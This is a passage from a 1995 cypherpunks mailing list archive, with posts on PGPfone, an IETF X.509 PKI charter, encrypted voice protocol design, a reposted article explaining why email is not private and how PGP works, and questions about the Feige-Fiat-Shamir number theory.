      of Justice. "They can talk him into cooperating, beat
      him into submission or shoot him. If they had an
      alternative to a conventional firearm, they would
      probably buy it, chortle and club him harder."

      Law engorgement is emerging as a virtually untapped
      arena for high-tech tomfoolery. Out-of-work federal
      laboratories are cooking up new Trekkie weapons. N.I.J.,
      the research honeypot of the US DoJ, has become a sort of
      Home Shopping Network for LEA's, taking their porky arms
      dreams to the desperado labs dreaming de Guerra Frio.

      The result: a host of goofy not-at-all-cheap Edsels
      and wipesnots: Sticky Foam (SNL); Rear-Seat Air Bag 
(IENL);
      Millimeter Wave Camera (LLNL); Smart Gun (SNL); Magic
      Fingerprinting Wand (Alaska State Crime Lab); Snare Net
      (Foster-Miller); Strobe Goggles (LLNL); Backscatter X-
      Ray Scanner.


   SOW_gut












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 12 Aug 95 22:31:15 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Significance of PGPFone?
Message-ID: <199508130528.WAA13866@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 AM 8/12/95 -0700, you wrote:
>* Finally, I have a "fax modem" on my Macintosh, as many of you do. Guess
>what? I went and got a real fax machine. Lots of reasons. First, my fax
>modem had to be installed just right...if inits or preferences got subtly
>shifted, it stopped working properly. Second, sending things was a bitch.
>(Had to have the scanner up and working, which was not often, etc.) Third,
>robustness.

We've got a box sitting next to the laser printer that receives faxes
and prints them on real paper, which is more reliable (and quieter and
lower-powered) than leaving the computer on, though it does require
leaving the printer on.  But for outgoing faxes, much of what I send
is from the computer anyway, so it's less of a problem (though, without
a scanner, I'm more likely to only fax stuff that I generated on the 
computer than drive to Kinkos...)

Perhaps we also need to build PGPfax?
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Aug 95 19:52:49 PDT
To: cypherpunks@toad.com
Subject: MS BuoysTBS to Buy CBS?
Message-ID: <199508130252.WAA01288@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is an amusing AP headline from 8:30 PM EDT. Anybody know 
if it's a joke, or care?


Microsoft Reportedly Considers Buying $1 Billion To $2 Billion
Stake In Turner Broadcasting; Deal Would Help Turner Make Bid 
For
CBS.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 12 Aug 95 22:35:24 PDT
To: cypherpunks@toad.com
Subject: IETF working to define a public key infrastructure
Message-ID: <9508130535.AA12801@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Help define the internet's web of trust model ...

>From: "warwick (w.s.) ford" <wford@bnr.ca>
Message-Id:  <"21210 Sat Aug 12 15:15:59 1995"@bnr.ca> 
To: pem-dev@tis.com, cat-ietf@mit.edu, ipsec@ans.net,
        e-payment@cc.bellcore.com, www-security@ns2.rutgers.edu,
        ietf-payments@cc.bellcore.com, pki-twg@nist.gov
Subject:  Proposal for New IETF WG on PKI 

Over the past couple of weeks, a group of interested individuals has been 
putting together a proposal for a new IETF Working Group to develop 
Internet standards for an X.509-based public-key infrastructure.  The result is 
the draft WG Charter attached below.  Since plans were announced last year to 
form this WG (and to shut down the PEM WG) it is considered reasonable to start 
up the new WG without the usual preliminary BOF at the next IETF.  Steve Kent 
and I have offered our services to co-chair this group, and Chandra Shrivastava 
has offered to run a mailing list.

The following mailing list has now been established for discussion of this 
proposal:  ietf-pkix@tandem.com.  To subscribe to the mailing list, send a 
messsage to listserv@tandem.com with the following in the body:
         subscribe <e-mail address> ietf-pkix

Warwick Ford
--------------------------------------------------------------------


Public-Key Infrastructure (X.509) Group
IETF Working Group Charter
---------------------------------------

Chair(s):
Applications Area Director(s)
Area Advisor:
Mailing lists:
        General Discussion:
        To Subscribe:
        In Body:
        Archive:
Description of Working Group:

Many Internet protocols and applications which use the Internet employ 
public-key technology for security purposes and require a public-key 
infrastructure (PKI) to securely deliver public keys to widely-distributed users 
or systems.  The X.509 standard constitutes a widely-accepted basis for such an 
infrastructure, defining data formats and procedures related to distribution of 
public keys via certificates digitally signed by certification authorities 
(CAs).  RFC 1422 specified the basis of an X.509-based PKI, targeted primarily 
at satisfying the needs of Internet Privacy Enhanced Mail (PEM).  Since RFC 1422 
was issued, application requirements for an Internet PKI have broadened 
tremendously, and the capabilities of X.509 have advanced with the development 
of standards defining the X.509 version 3 certificate and version 2 certificate 
revocation list (CRL).

The task of the Working Group will be to develop Internet standards needed to 
support an X.509-based PKI.  The goal of this PKI will be to facilitate the use 
of X.509 certificates in multiple applications which make use of the Internet 
and to promote interoperability between different implementations choosing to 
make use of X.509 certificates.  The resulting PKI is intended to provide a 
framework which will support a range of trust/hierarchy environments and a range 
of usage environments (RFC1422 is an example of one such model).

Candidate applications to be served by this PKI include, but are not limited to, 
PEM, MOSS, GSS-API mechanisms (e.g., SPKM), ipsec protocols, Internet payment 
protocols, and www protocols.  This project will not preclude use of 
non-infrastructural public-key distribution techniques nor of non-X.509 PKIs by 
such applications.  Efforts will be made to coordinate with the IETF White Pages 
(X.500/WHOIS++) project.

The group will focus on tailoring and profiling the features available in
the v3 X.509 certificate to best match the requirements and characteristics
of the Internet environment.

Other topics to be addressed potentially include:
- Alternatives for CA-to-CA certification links and structures, including
  guidelines for constraints
- Revocation alternatives, including profiling of X.509 v2 CRL extensions
- Certificate and CRL distribution options (X.500-based, non-X.500-based)
- Guidelines for policy definition and registration
- Administrative protocols and procedures, including certificate generation,
  revocation notification, cross-certification, and key-pair updating
- Naming and name forms (how entities are identified, e.g., email address,
  URN, DN, misc.)


Goals and Milestones:

Sep, 95   Agreement on draft Working Group charter
Nov, 95   Completion of initial strawman PKI specification
Dec, 95   First Working Group meeting (Dallas IETF) 
Jul, 96   Submit PKI (X.509) specification for
          consideration as Proposed standard.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 13 Aug 95 01:13:26 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <v02120d01ac51ef81b1df@[192.0.2.1]>
Message-ID: <199508130813.EAA02621@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 14:42 8/11/95, Ray Cromwell wrote:
> 
> >I would like to see a secure voice communication protocol that is divorced
> >from the particular details of the algorithms used (although a
> >base level of some voice compression technique + DES + RSA will have to
> >be used) That way, new and better algorithms can be dropped in depending
> >on the network used (modem, ipx, tcp/udp, etc) and the bandwidth required
> >(CELP vocoder, MPEG-audio, lossless encoding, progressive PCM, etc)
> 
> The codec used is at the very core of any computer telephony system. A
> standard that doesn't specify the codec(s) can be little more than a
> standard on message formats, which will be of little value if the other
> side doesn't implement the same codec.

  Uh, that's why you define a base level of support like I said. This
same arguments applies to all communications technology, such as 
secure ip, e-mail standards, etc. You always have a base defined to
insure something to fall back on. that has absolutely nothing to do
with my comments which are directed at developing an open standard
for inteoperability that allows other algorithms to be sused rather
than locking everyone into a particular codec. The codec is irrevelent,
it's cement in the foundation, but the design of the house is more
important to the end user. The message protocol and application
level is much more important because it controls 1) how easy
it is to create applications, and 2) how those competing
applications can interoperate with each other. These supports
a rich market with lots of interoperating "phones". on the other
hand, a poorly designed protocol will lead to a market dominated
by one or two proprietary players that is hard to upgrade
when better capabilities come out later, or new demands are made. 

  There are other reasons to abstract above codecs, for instance, a
lot of codec algorithms are patented or trademarked, so that
if a program is "welded" to any particular codec, you create hassles
for application developers who can't use non-open algorithms.

  Finally, abstracting above the codecs allows competition between
codec developers ( a sub market) whereas a design that locks in
one particular codec pretty much forces price competition
only.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 13 Aug 95 01:29:18 PDT
To: eb@comsec.com (Eric Blossom)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508112143.OAA02837@comsec.com>
Message-ID: <199508130829.EAA04681@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



[stuff about tuning algorithm to channel characteristics]
> 
> None of this says that you shouldn't also optimize for the packetized
> case too.  I think that you can negotiate the right behavior at start
> up time based on detected channel characteristics.  I think that the
> biggest impact is in the framing overhead, or lack of it.
> 
> You are always trading off bandwidth, speech quality and MIPs.

 I agree with this, but it is still possible to do all this through
an abstract interface layer. One can "query the line characteristics"
of a transmission layer and then limit the selection of algorithms
based on those characteristics.

Example: we have a class TransmissionLayer, and two derived
classes "syncrhonouslayer" and "asynchronouslayer" (subclass as
appropriate). Note, no underlying link type is being refered
to.  It could be a network or a modem.

Now we have a bunch of algorithms (codecs), CodecA is optimized for
a synchronouslayer with atleast 16kpbs. CodecB for asynchronous
packet networks.

At the application layer, the user chooses a way of connecting.
The application instantly picks the best codec (supported
by both ends) for that transmissionlayer. it alo updates the user
interface automatically, e.g. displaying a "half duplex"
mode for one type of link, or "conference call' for another.
Some types might not support all encryption types
because of cpu limits (also detected)  There's no reason
this could not be programmed. It would also be highly portable,
highly maintainable, and more easily adoptable.

Direct-to-hardware hardwired algorithm software is good for
proof of concept. But I'm thinking ahead, to a time when
a multimedia protocol will be just another transport layer ontop of
which cool applications are running. (like http+mime runs over
TCp)

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 13 Aug 95 06:17:29 PDT
To: cypherpunks@toad.com
Subject: EYE_see
Message-ID: <199508131317.JAA15824@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-13-95. NYPaper:


   "One Source, Many Ideas In Foster Case: Publisher Bankrolls
   Cover Up Theories."

      The theory of a Vincent Foster murder and a cover-up has
      been promoted by a handful of foundations and
      publications united by a common denominator: the money
      of Richard Mellon Scaife.

      "The death of Vincent Foster: I think that's the Rosetta
      Stone to the whole Clinton Administration," said Mr.
      Scaife, a newspaper publisher with half a billion
      dollars in the bank, during a two-hour interview.


   EYE_see (about 5K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 13 Aug 95 12:00:44 PDT
To: cypherpunks@toad.com
Subject: Why does the feed always get hosed on a weekend?
Message-ID: <199508131858.OAA23027@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It seems that everytime majordomo goes down is on a weekend. Why is that?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMC5K9yoZzwIn1bdtAQH3igF+OiLvo0hfV8cGyATot6QF82UZVVc8JMTm
yfoD6JSv0bUondWXt/4kVk/cUzEWFOz7
=/FnW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 13 Aug 95 13:34:14 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Who Else is Reading your Email? (From Cu Digest, #7.67)
Message-ID: <Pine.ULT.3.91.950813152944.3887A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Normally, I don't like reposting things to this list.  However, I am 
going to report this from the most recent version of CuD, because I think 
it hits a very important nail right on the head.  Not just that PGP is 
going, but it puts all of the terms we on this list have been bantering 
around for the last couple of years into ones that laymen can understand.

I sincerely thing that this is the kind of push we need to make as a 
whole to bring about social change on the net (and social change is what 
is needed).  Ie, PGP is good because 1) it keeps people from reading your 
email (like an envelope) and 2) it makes sure nobody forges your messages 
by allowing you to digitally sign them.

Anyways, sorry for the report, please flame lightly :-)

- ---------------------------------------------------------------------

Date: Wed, 09 Aug 1995 19:25:49 -0400
From: kkc@INTERLOG.COM(K.K. Campbell)
Subject: File 1--Who Else is Reading your Email?

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye WEEKLY                                                June 29 1995
Toronto's arts newspaper                      .....free every Thursday
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye.NET                                                        eye.NET

                    WHO ELSE IS READING YOUR EMAIL?
                   Part 1 of a 2-part series on PGP

                                 by
                            K.K. CAMPBELL

I recently conducted an overseas interview with a "computer security
person at a highly sensitive facility." Mr. Security explained that the
potential misuse of the computer resources of this site was a serious
concern, a danger to thousands. This instilled in him a peppery dash of
paranoia about who was using what machine for what purpose.

In discussing this, the name of a certain, rather net.famous individual
arose. I was surprised to learn this individual was well-known in
international security circles. This individual is considered a "risk."
I was informed that this person's email is "monitored."

To spell it out: people were reading and collecting all the email the
"risk" wrote. Without the target's knowledge. Without any form of
warrant.

Most netters think such intrusion involves someone "hacking a
password." Wrong. When you hit the "send" command for email, your
missive seems to (poof!) magically appear in the recipient's mailbox.
Person to person. The ultimate intimacy. Wrong again. Email is actually
passed through a number of computers. The operator of one of those
machines can effortlessly read your email. Any one who "breaks into"
such a machine can inspect your mail. Once in, they can tamper with
files so that all your email is copied to another location, without you
being aware of it.

But not everyone wants to "break into" a computer. In the above case,
email was copied "in transit." When email is transferred from machine
to machine, it is made readable. So if you intercept a copy (through
"sniffers"), you can read it. Everything this individual had written
over the last couple of years has apparently been intercepted and read.
His file is huge.

With Canada news media in a tizzy about "regulating the net," how long
before CSIS requests funds to start collecting posts with buzzwords in
the network data flow?

                POSTCARDS

It should be the first lesson every newbie learns: email ain't secure.
An email is like a postcard: it travels through the many sets of hands
in delivery and any set of hands can read it if so inclined. Most
postal employees don't, for two reasons: there is so much mail they
haven't the time, and most postcards are so boring, who the hell wants
to?

The same goes with the system administrators who oversee the shunting
around of all your cyberscribbling. Most don't snoop, but some do. Need
I remind you that, er, sysadmins are not a monolithically
mature-and-well-adjusted breed imbued with highly developed moral
principles...

What can you, the lowly downtrodden, rights-less end-user, do? You have
three strategies:

 -- no precautions: who cares if anyone reads what you write/receive;
 -- minimal coding, easy to crack, but enough to stop casual snoops --
  kind of like "virtual envelopes"; and
 -- PGP.

PGP stands for Pretty Good Privacy -- a humble title to be sure,
considering that the U.S. government/military wants to ban the thing.
And why? Because PGP has the power to thwart their zillion-dollar spy
efforts by imbuing everyday folk with the cryptographic might of the
best "puzzle palaces" around the world.

The elegantly powerful encryption device is the offspring of Colorado
resident Phil Zimmermann (prz@acm.org). He basically took all the (very
public) papers on cryptography, stirred it together and voil=E1: instant
"threat to democracy" -- if you buy the government/military propaganda.
(More on Zimmermann and the cryptographic spook backlash next issue
[below].)

What PGP does is solve that decades old spy/cryptography dilemma: How
can one send secure messages to absolute strangers over an insecure
medium?

PGP exploits two historical developments:

 -- home computers gave commoners the computational power to use the
  sophisticated cryptography algorithms; and
 -- the advent of public key encryption in the late '70s bade
  farewell to Ilya Kuryakin and Napoleon Solo.

Computers were originally designed (back in World War II) to be
sophisticated code breakers. Today, government/military bureaucracy
(especially in the U.S.) still operate with that attitude: computer
cryptography is a military weapon.

In those Cold War days, the only way to send secure messages over
insecure channels (telegraphs, phones, mail, etc.) was to first
deliver a "cryptographic key" via secure channels. The key was
something like a little code book; the secure delivery channel was
usually a dour-faced courier with a black bag handcuffed to his wrist.
"Deliver this or die doing so, 007..."

          BE AN INTERNATIONAL ARMS DEALER!

Governments and mega-corps could afford to send satchel-toting couriers
overseas, but us proles had little hope of doing that. So citizens were
always vulnerable to mail-opening, phone-tapping spooks.

PGP uses two keys -- a public key and a secret key. Anyone can use your
public key to encrypt a message to you, and only you can then decrypt
it with your secret key. As long as your secret key remains secret, no
one can read that message -- not even the person who encrypted. The
idea is to spread your public key around in Key Exchanges, like phone
books.

For details on this complex subject, try _PGP: Pretty Good Privacy_ by
Simson Garfinkel (O'Reilly & Assoc., http://www.ora.com, $29.95 paper).
Or _The Computer Privacy Handbook_ (Peachpit Press,
http://www.peachpit.com/peachpit, $31.95 paper). Both go beyond
technical details and delve into the sociopolitical issues around
privacy.

Where can you get PGP? All around the world. PGP is freeware -- you can
use it endlessly without cost. But remember: The U.S. State Department
export restrictions classify cryptographic materials to be munitions.
Exporting it from the U.S. is a serious matter. For those uninterested
in becoming international arms smugglers, do an Archie search for "PGP"
or try Toronto's Interlog at ftp://ftp.interlog.com/pub/pgp . Read
newsgroups alt.security.pgp and sci.crypt for discussions.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMC5FqjokqlyVGmCFAQEIogQAqMhbVQnCI9ElX0rVYQO/7cuY+YWqLQhh
9bZOsis9Tfp2ko9KJ9Dpek8wHo/I3ODCPbY3flxwE/q6ogU1DJvJXYzWtc7fmbOH
QI2038hRnnt8bsMei/WQEunuo5iGCAzrTuOG/PkfkB2GsM4/5b6jaHlWCCSIdGoz
JzyXt0dMJoE=
=kR1W
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 13 Aug 95 06:37:42 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v01510101ac52bb169eb8@[193.74.217.18]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Anonymous says ....

>will someone just CUT THE @#$%^&* FOSTER CONSPIRACY THEORIES??
>I'm getting F---ING SICK AND TIRED of all the BULL**** that

and says....

>any good drill instructer. oh yes, so many of you pansies
>need to get into a serious digital BOOT camp. learn some real

and says...

>"mind masturbating and drug fondling" parties every few
>days with all the Hoi Poilloi Holier-Than-Thou pricks of
>the world, the "cum of the net" ejaculating all over each
>other, hehehehehehe what a bunch of effeminate nobodies...

and says...

>the most scurrilous swine for taking up PARRY's time with
>your filling up this mailing list with GARBAGE? TRASH?
>EXCREMENT? ODIOUS EFFLUVIA??? don't you know that it cuts

and says...

>UNIX SOFTWARE AND HOW TO WRITE A CORRECT DNS LOOKUP VIA
>SOCKET LIBRARIES. are we cypherpunks, or cypherprogrammers?
>GET A CLUE, PEOPLE.

and says...

>I'M GOING TO MAILBOMB THE WHOLE LIST. that'll teach the
>@#$^%^&* bastards to mess with MY VALUABLE TIME.

I say:

Anonymous, you could learn to relax a little.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMC0LjI4k1+54BopBAQGGBwQAgovXJ5zJKFWs8h/hdwOW91MT22BBZwCf
jo9WRwzuM2x6C2cDPM5ti5V0CNEG5RY64jXbd6By4At5ALN1Y671Mb2Eh51c9K6R
EjG0Ihm1um0Knv50fsta0UqcH5r9YHl1AZAVAe2f7xPPYBA6M/0f5S7KUGhfcOgX
yqX8pM5pKOI=
=efaH
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 13 Aug 95 14:27:43 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Who Else is Reading your Email? (From Cu Digest, #7.67)
Message-ID: <Pine.ULT.3.91.950813162604.4794B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm resending this message because I think it's important and because the 
list went down again but appears to be back up now.  :-)

========================================================================

Normally, I don't like reposting things to this list.  However, I am 
going to report this from the most recent version of CuD, because I think 
it hits a very important nail right on the head.  Not just that PGP is 
going, but it puts all of the terms we on this list have been bantering 
around for the last couple of years into ones that laymen can understand.

I sincerely thing that this is the kind of push we need to make as a 
whole to bring about social change on the net (and social change is what 
is needed).  Ie, PGP is good because 1) it keeps people from reading your 
email (like an envelope) and 2) it makes sure nobody forges your messages 
by allowing you to digitally sign them.

Anyways, sorry for the report, please flame lightly :-)

- ---------------------------------------------------------------------

Date: Wed, 09 Aug 1995 19:25:49 -0400
From: kkc@INTERLOG.COM(K.K. Campbell)
Subject: File 1--Who Else is Reading your Email?

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye WEEKLY                                                June 29 1995
Toronto's arts newspaper                      .....free every Thursday
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye.NET                                                        eye.NET

                    WHO ELSE IS READING YOUR EMAIL?
                   Part 1 of a 2-part series on PGP

                                 by
                            K.K. CAMPBELL

I recently conducted an overseas interview with a "computer security
person at a highly sensitive facility." Mr. Security explained that the
potential misuse of the computer resources of this site was a serious
concern, a danger to thousands. This instilled in him a peppery dash of
paranoia about who was using what machine for what purpose.

In discussing this, the name of a certain, rather net.famous individual
arose. I was surprised to learn this individual was well-known in
international security circles. This individual is considered a "risk."
I was informed that this person's email is "monitored."

To spell it out: people were reading and collecting all the email the
"risk" wrote. Without the target's knowledge. Without any form of
warrant.

Most netters think such intrusion involves someone "hacking a
password." Wrong. When you hit the "send" command for email, your
missive seems to (poof!) magically appear in the recipient's mailbox.
Person to person. The ultimate intimacy. Wrong again. Email is actually
passed through a number of computers. The operator of one of those
machines can effortlessly read your email. Any one who "breaks into"
such a machine can inspect your mail. Once in, they can tamper with
files so that all your email is copied to another location, without you
being aware of it.

But not everyone wants to "break into" a computer. In the above case,
email was copied "in transit." When email is transferred from machine
to machine, it is made readable. So if you intercept a copy (through
"sniffers"), you can read it. Everything this individual had written
over the last couple of years has apparently been intercepted and read.
His file is huge.

With Canada news media in a tizzy about "regulating the net," how long
before CSIS requests funds to start collecting posts with buzzwords in
the network data flow?

                POSTCARDS

It should be the first lesson every newbie learns: email ain't secure.
An email is like a postcard: it travels through the many sets of hands
in delivery and any set of hands can read it if so inclined. Most
postal employees don't, for two reasons: there is so much mail they
haven't the time, and most postcards are so boring, who the hell wants
to?

The same goes with the system administrators who oversee the shunting
around of all your cyberscribbling. Most don't snoop, but some do. Need
I remind you that, er, sysadmins are not a monolithically
mature-and-well-adjusted breed imbued with highly developed moral
principles...

What can you, the lowly downtrodden, rights-less end-user, do? You have
three strategies:

 -- no precautions: who cares if anyone reads what you write/receive;
 -- minimal coding, easy to crack, but enough to stop casual snoops --
  kind of like "virtual envelopes"; and
 -- PGP.

PGP stands for Pretty Good Privacy -- a humble title to be sure,
considering that the U.S. government/military wants to ban the thing.
And why? Because PGP has the power to thwart their zillion-dollar spy
efforts by imbuing everyday folk with the cryptographic might of the
best "puzzle palaces" around the world.

The elegantly powerful encryption device is the offspring of Colorado
resident Phil Zimmermann (prz@acm.org). He basically took all the (very
public) papers on cryptography, stirred it together and voil=E1: instant
"threat to democracy" -- if you buy the government/military propaganda.
(More on Zimmermann and the cryptographic spook backlash next issue
[below].)

What PGP does is solve that decades old spy/cryptography dilemma: How
can one send secure messages to absolute strangers over an insecure
medium?

PGP exploits two historical developments:

 -- home computers gave commoners the computational power to use the
  sophisticated cryptography algorithms; and
 -- the advent of public key encryption in the late '70s bade
  farewell to Ilya Kuryakin and Napoleon Solo.

Computers were originally designed (back in World War II) to be
sophisticated code breakers. Today, government/military bureaucracy
(especially in the U.S.) still operate with that attitude: computer
cryptography is a military weapon.

In those Cold War days, the only way to send secure messages over
insecure channels (telegraphs, phones, mail, etc.) was to first
deliver a "cryptographic key" via secure channels. The key was
something like a little code book; the secure delivery channel was
usually a dour-faced courier with a black bag handcuffed to his wrist.
"Deliver this or die doing so, 007..."

          BE AN INTERNATIONAL ARMS DEALER!

Governments and mega-corps could afford to send satchel-toting couriers
overseas, but us proles had little hope of doing that. So citizens were
always vulnerable to mail-opening, phone-tapping spooks.

PGP uses two keys -- a public key and a secret key. Anyone can use your
public key to encrypt a message to you, and only you can then decrypt
it with your secret key. As long as your secret key remains secret, no
one can read that message -- not even the person who encrypted. The
idea is to spread your public key around in Key Exchanges, like phone
books.

For details on this complex subject, try _PGP: Pretty Good Privacy_ by
Simson Garfinkel (O'Reilly & Assoc., http://www.ora.com, $29.95 paper).
Or _The Computer Privacy Handbook_ (Peachpit Press,
http://www.peachpit.com/peachpit, $31.95 paper). Both go beyond
technical details and delve into the sociopolitical issues around
privacy.

Where can you get PGP? All around the world. PGP is freeware -- you can
use it endlessly without cost. But remember: The U.S. State Department
export restrictions classify cryptographic materials to be munitions.
Exporting it from the U.S. is a serious matter. For those uninterested
in becoming international arms smugglers, do an Archie search for "PGP"
or try Toronto's Interlog at ftp://ftp.interlog.com/pub/pgp . Read
newsgroups alt.security.pgp and sci.crypt for discussions.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMC5SVDokqlyVGmCFAQFaVQP/ZhMQ76OKza2p8Peo6ywghqcfGtqv9aM4
VQesZ0BHq2hAFPQUCWP2iR3shdnSTdtZgYutYzwrnlpVe+CLtpy7+zIRBWscGWVP
W2je/CiWcpmrmtnA0d71Kp7bkPcpRJCo9l8CGyktjUKQMRsz5spRidtBOw+/Dm8g
7HhNw0DTdEU=
=8ZlA
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ihtfp.org>
Date: Sun, 13 Aug 95 17:48:10 PDT
To: Ben <adept@minerva.cis.yale.edu>
Subject: Re: Q's on Number Theory/Quadriatic Residues
In-Reply-To: <199508132330.AA08361@minerva.cis.yale.edu>
Message-ID: <199508140047.RAA26889@ihtfp.org>
MIME-Version: 1.0
Content-Type: text/plain


>                  -1             -1
>         v       v         sqrt(v  )
>          16      11           ***9
>          29      29           ***8
> 
> ***How are these square roots?  9 is certainly not the square root of
> 11, nor is 8 the square root of 29, even modulo 35.

Bzzt!  Try Again.  If you use bc, you will notice that 9^2 mod 35 == 11
and 8^2 mod 35 == 29...  You should go take your number theory class!

> 81%35
> 11
> 64%35
> 29

>         mean "the inverse of v."  Are these two expressions interchangeable
>         or is this something that I should have found in the errata?

Yes.  It is the multiplicative inverse.  This is very basic math.  Go
re-read your 7th-grade algebra book:
	v^(-1) == 1/v

Take your number theory class, and if you can't figure out after that,
re-ask the questions.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 13 Aug 95 16:02:25 PDT
To: cypherpunks@toad.com
Subject: EYE_see
Message-ID: <199508132302.TAA05634@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-13-95. NYPaper:


   "One Source, Many Ideas In Foster Case: Publisher Bankrolls
   Cover Up Theories."

      The theory of a Vincent Foster murder and a cover-up has
      been promoted by a handful of foundations and
      publications united by a common denominator: the money
      of Richard Mellon Scaife.

      "The death of Vincent Foster: I think that's the Rosetta
      Stone to the whole Clinton Administration," said Mr.
      Scaife, a newspaper publisher with half a billion
      dollars in the bank, during a two-hour interview.


   EYE_see (about 5K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <adept@minerva.cis.yale.edu>
Date: Sun, 13 Aug 95 16:30:32 PDT
To: cypherpunks@toad.com
Subject: Q's on Number Theory/Quadriatic Residues
Message-ID: <199508132330.AA08361@minerva.cis.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying to get myself up to speed on some of the protocols in
_Applied_Cryptography_ and my woeful lack of number theory is showing through
crystal clear.

While a course on number theory is in the works for the fall, right now, I'm
sort
of curious and would appreciate any sort of response I can get to the following 
questions from those of you to whom number theory is not as much of a stranger.

1)In AC on page 293 in the section on the Feige-Fiat-Shamir, there is a 
chart which lists the residues, their inverses and their square roots, all
modulo
35.  The chart, which I have reproduced below, baffles me--at least the part 
for the square roots:

                 -1             -1
        v       v         sqrt(v  )
